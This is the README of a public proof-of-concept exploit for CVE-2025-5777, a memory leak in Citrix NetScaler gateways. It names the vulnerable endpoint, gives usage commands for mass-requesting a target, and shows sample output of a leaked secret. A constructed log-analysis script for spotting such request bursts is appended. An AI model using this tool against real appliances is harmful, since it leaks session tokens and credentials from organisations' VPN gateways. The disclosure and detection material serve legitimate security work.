CVE-2025-5777 PoC — NetScaler ADC and NetScaler Gateway - Insufficient input validation leading to memory overread

Associated Vulnerability
Title: NetScaler ADC and NetScaler Gateway - Insufficient input validation leading to memory overread (CVE-2025-5777)
Description: Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server

PoC Description: Citrix NetScaler Memory Leak PoC

Readme
# CVE-2025-5777 - Citrix NetScaler Memory Leak PoC

## 📌 Description

This script exploits a critical memory disclosure vulnerability in Citrix NetScaler ADC/Gateway appliances, identified as **CVE-2025-5777** (dubbed **CitrixBleed 2**). It triggers a memory leak through the `/p/u/doAuthentication.do` endpoint, revealing uninitialized memory containing sensitive data such as XML fragments, tokens, and potentially credentials.

* 📅 **CVE ID:** CVE-2025-5777
* ⚙️ **Impact:** Information Disclosure
* 🧑‍💻 **Author:** \[0xgh057r3c0n]
* 🧵 **Concurrency:** Asynchronous with `aiohttp`
* 📦 **Dependencies:** `aiohttp`, `colorama`

---

## 🚀 Features

* Asynchronous mass-request engine using `asyncio + aiohttp`
* Hex dump of leaked memory fragments
* Auto-detection of the `<InitialValue>` memory leak
* Verbose mode for debugging and response preview
* Graceful interrupt handling (Ctrl+C)

---

## 🧪 Usage

```bash
python3 CVE-2025-5777.py http://<target> [options]
```

### 🔧 Options

| Option          | Description                                    |
| --------------- | ---------------------------------------------- |
| `-v, --verbose` | Enable verbose debug output                    |
| `-p <proxy>`    | Use HTTP proxy (e.g., `http://127.0.0.1:8080`) |
| `-t <threads>`  | Number of concurrent requests (default: 10)    |

---

## 📥 Example

```bash
python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
```

---

## 📤 Sample Output

```
_____________   _______________         _______________   ________   .________          .___________________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
        \/                  \/                  \/     \/         \/       \/                 \/                             

         Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
                     Author: 0xgh057r3c0n

[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] Found InitialValue Memory Leak!
[🧠] Hex Dump:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
------------------------------------------------------------------------

[✔️ ] Leak confirmed. Continuing extraction...
```
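
For defenders, the traffic this tool generates shows up in HTTP access logs as many POSTs to `/p/u/doAuthentication.do` from one client in a short time. The script below is an added example, not part of the original PoC or its author's code; it assumes Common Log Format lines from a proxy or load balancer in front of the appliance, and the sample lines, `threshold` and `window` values are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

ENDPOINT = "/p/u/doAuthentication.do"  # endpoint named in this README
# Assumption: Common Log Format lines (client, timestamp, request, status).
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" \d{3}')

def parse(line):
    """Return (ip, timestamp, method, path) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]

def find_bursts(lines, threshold=5, window=timedelta(seconds=10)):
    """Map client IP -> peak number of POSTs to ENDPOINT inside one window,
    for clients that reach `threshold`. Lines must be in time order."""
    recent = defaultdict(deque)  # per-client sliding window of timestamps
    peaks = {}
    for line in lines:
        rec = parse(line)
        if rec is None or rec[2] != "POST" or rec[3] != ENDPOINT:
            continue
        ip, ts = rec[0], rec[1]
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # drop entries older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

def _line(ip, sec, method="POST", path=ENDPOINT):
    # Constructed sample line; addresses are documentation ranges.
    return (f'{ip} - - [01/Jul/2025:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" 200 512')

SAMPLE_LOG = (
    [_line("198.51.100.7", s) for s in (0, 0, 1, 1, 2, 2, 3)]  # burst
    + [_line("192.0.2.10", s) for s in (5, 40)]                # two logins
    + [_line("192.0.2.11", 12, "GET", "/index.html")]          # unrelated
)

if __name__ == "__main__":
    print(find_bursts(SAMPLE_LOG))
```

A hit only shows request volume against the endpoint; whether memory was disclosed has to be judged from the appliance's patch level and the response content.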

---

## ⚠️ Disclaimer

> This proof-of-concept is intended for **educational and authorized security testing only**.
> Unauthorized scanning or exploitation of systems you don't own is **illegal**.

---
